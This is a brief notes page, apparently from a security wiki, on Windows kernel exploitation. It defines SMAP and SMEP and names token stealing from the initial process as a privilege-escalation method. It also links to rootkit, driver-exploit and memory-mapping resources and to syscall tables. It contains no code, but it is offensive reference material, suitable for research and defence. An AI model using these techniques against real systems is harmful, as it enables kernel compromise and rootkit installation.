Exploitation

Exploitation¶

https://rootkits.xyz/blog/2017/06/kernel-setting-up/

Rusty Windows Kernel Rootkit
Anti Cheats

Protections¶

SMAP (Supervisor Mode Access Prevention) - Prevent the Kernel from accessing user mapped memory
SMEP (Supervisor Mode Execution Prevention) - Prevent Kernel mode from executing code from usermode

Both of these flags are in the CR4 register

Mapping Physical Memory¶

https://git.back.engineering/_xeroxz/vdm

Driver Exploitation¶

https://github.com/stong/CVE-2020-15368/

Privilege Escalation¶

Copy the security token from the INIT process

https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/

Windows Syscalls¶

https://github.com/j00ru/windows-syscalls

Note

Windows Syscalls change for each version of Windows